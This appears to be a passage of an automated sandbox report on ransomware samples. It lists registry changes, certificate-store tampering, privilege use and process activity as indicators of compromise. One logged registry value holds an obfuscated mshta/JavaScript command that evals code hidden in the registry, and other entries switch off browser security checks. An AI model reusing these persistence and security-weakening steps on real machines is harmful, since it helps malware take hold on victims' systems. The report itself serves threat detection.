Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\WallpaperStyle = "0"	Trojan-Ransom.Win32.Cryptor.asv-826b02f896032d0abb0afb2f4a5228f8dc148518f29007929cc8b5368dc1dec2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\TileWallpaper = "0"	Trojan-Ransom.Win32.Cryptor.asv-826b02f896032d0abb0afb2f4a5228f8dc148518f29007929cc8b5368dc1dec2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\WallpaperStyle = "0"	Trojan-Ransom.Win32.Cryptor.agg-8e68f65eb8f0e02cf203c31d8cbb5e5c30bc78e06d77272b4493ca1c97fc048d.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\TileWallpaper = "0"	Trojan-Ransom.Win32.Cryptor.agg-8e68f65eb8f0e02cf203c31d8cbb5e5c30bc78e06d77272b4493ca1c97fc048d.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\don't load	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\don't load\wscui.cpl = "No"	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\WallpaperStyle = "0"	HEUR-Trojan-Ransom.Win32.Locky.vho-c6bb72e0a48fcf77920ddc48dd799f04a73ca287f56afb3dd5709725a67e8564.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\TileWallpaper = "0"	HEUR-Trojan-Ransom.Win32.Locky.vho-c6bb72e0a48fcf77920ddc48dd799f04a73ca287f56afb3dd5709725a67e8564.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Security\Trust Warning Level = "No Security"	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\Version = "3"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "4"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{CB0B3341-A470-11EF-9CB9-62CAC36041A9} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Security\Safety Warning Level = "SucceedSilent"	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Download\CheckExeSignatures = "no"	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Download	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\New Windows\PopupMgr = "no"	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Security	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FC32E121-A470-11EF-9CB9-62CAC36041A9} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\New Windows\PlaySound = "0"	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe

Modifies registry class 13 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\eeb02d	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\eeb02d\shell	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\eeb02d\shell\open	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\eeb02d\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\.4f6ae76	regsvr32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\.4f6ae76\ = "eeb02d"	regsvr32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\eeb02d\shell\open\command\ = "mshta \"javascript:DUI1ZMJ1=\"w15I5J\";VL69=new ActiveXObject(\"WScript.Shell\");BQYfac08z=\"uwYySTDsC\";Xnm6i=VL69.RegRead(\"HKCU\\\\software\\\\npzlo\\\\uhlmbbrw\");jx2dCbPI8=\"d\";eval(Xnm6i);kUAoCx5g9=\"Yyg\";\""	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	kugvwgbsmmic.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	kugvwgbsmmic.exe

Opens file in notepad (likely ransom note) 4 IoCs

ransomware

pid	Process
2308	NOTEPAD.EXE
3236	NOTEPAD.EXE
1460	NOTEPAD.EXE
1728	NOTEPAD.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3548	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 14 IoCs

pid	Process
2428	HEUR-Trojan-Ransom.Win32.Agent.gen-b04fcd4778f72c0a66bd4319b54bc722365a4783ac2347bc77602f19e64da13c.exe
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
3016	HEUR-Trojan-Ransom.Win32.Locky.vho-c6bb72e0a48fcf77920ddc48dd799f04a73ca287f56afb3dd5709725a67e8564.exe
1216	Trojan-Ransom.NSIS.MyxaH.qbx-f6177cf7c64fd3b888db4ef8e4c5b7e89198bb99f28ef16e4ddf686bc0a07721.exe
1732	Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe
2724	Trojan-Ransom.Win32.Bitman.jiv-f470b91f6fdbb9170b4fccffe1a7a25e50832c8658bdd0f4816e219d2d460b73.exe
920	Trojan-Ransom.Win32.Bitman.lli-c1f58f6b35fba846df52983a880afa4aea441e19b446c753eff7da1a942c09ca.exe
1432	Trojan-Ransom.Win32.Bitman.noi-73a2ed1606f22e828554948d7f79dd99f2858bc3465e5065abcbf90d98583b3c.exe
2220	Trojan-Ransom.Win32.Bitman.qkb-0f7b56a20b8b81412d2ad1f9b80ee6002f6875105f546a7a8404a43ed73b1ef4.exe
2780	Trojan-Ransom.Win32.Bitman.qrz-717d61d17cda60a8fc6112e1f92ea2cb8bfec8dbecd91ab22e91159cf024bb24.exe
2252	Trojan-Ransom.Win32.Cryptor.agg-8e68f65eb8f0e02cf203c31d8cbb5e5c30bc78e06d77272b4493ca1c97fc048d.exe
1836	Trojan-Ransom.Win32.Cryptor.asv-826b02f896032d0abb0afb2f4a5228f8dc148518f29007929cc8b5368dc1dec2.exe
3004	Trojan-Ransom.Win32.Foreign.jpdw-0b6bd6dbd74117ce41d96712e6f309bd9809732517b6320c8370e0e9434e7e98.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
1096	anli.exe
2948	anli.exe
2948	anli.exe
2516	hbtwdghtnrjw.exe
2516	hbtwdghtnrjw.exe
2516	hbtwdghtnrjw.exe
2516	hbtwdghtnrjw.exe
2516	hbtwdghtnrjw.exe
2516	hbtwdghtnrjw.exe
2516	hbtwdghtnrjw.exe
2516	hbtwdghtnrjw.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1128	Explorer.EXE

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
2428	HEUR-Trojan-Ransom.Win32.Agent.gen-b04fcd4778f72c0a66bd4319b54bc722365a4783ac2347bc77602f19e64da13c.exe
328	powershell.exe
3564	regsvr32.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
2568	ocenlufjyvdi.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2368	7zFM.exe
Token: 35	2368	7zFM.exe
Token: SeSecurityPrivilege	2368	7zFM.exe
Token: SeDebugPrivilege	920	Trojan-Ransom.Win32.Bitman.lli-c1f58f6b35fba846df52983a880afa4aea441e19b446c753eff7da1a942c09ca.exe
Token: SeShutdownPrivilege	1128	Explorer.EXE
Token: SeShutdownPrivilege	1128	Explorer.EXE
Token: SeShutdownPrivilege	1128	Explorer.EXE
Token: SeShutdownPrivilege	1128	Explorer.EXE
Token: SeShutdownPrivilege	1128	Explorer.EXE
Token: SeDebugPrivilege	2516	hbtwdghtnrjw.exe
Token: SeDebugPrivilege	1432	Trojan-Ransom.Win32.Bitman.noi-73a2ed1606f22e828554948d7f79dd99f2858bc3465e5065abcbf90d98583b3c.exe
Token: SeDebugPrivilege	2220	Trojan-Ransom.Win32.Bitman.qkb-0f7b56a20b8b81412d2ad1f9b80ee6002f6875105f546a7a8404a43ed73b1ef4.exe
Token: SeShutdownPrivilege	1128	Explorer.EXE
Token: SeShutdownPrivilege	1128	Explorer.EXE
Token: SeShutdownPrivilege	1128	Explorer.EXE
Token: SeShutdownPrivilege	1128	Explorer.EXE
Token: SeShutdownPrivilege	1128	Explorer.EXE
Token: SeShutdownPrivilege	1128	Explorer.EXE
Token: SeDebugPrivilege	2568	ocenlufjyvdi.exe
Token: SeDebugPrivilege	1692	fjyvdiaajoqw.exe
Token: SeIncreaseQuotaPrivilege	1880	WMIC.exe
Token: SeSecurityPrivilege	1880	WMIC.exe
Token: SeTakeOwnershipPrivilege	1880	WMIC.exe
Token: SeLoadDriverPrivilege	1880	WMIC.exe
Token: SeSystemProfilePrivilege	1880	WMIC.exe
Token: SeSystemtimePrivilege	1880	WMIC.exe
Token: SeProfSingleProcessPrivilege	1880	WMIC.exe
Token: SeIncBasePriorityPrivilege	1880	WMIC.exe
Token: SeCreatePagefilePrivilege	1880	WMIC.exe
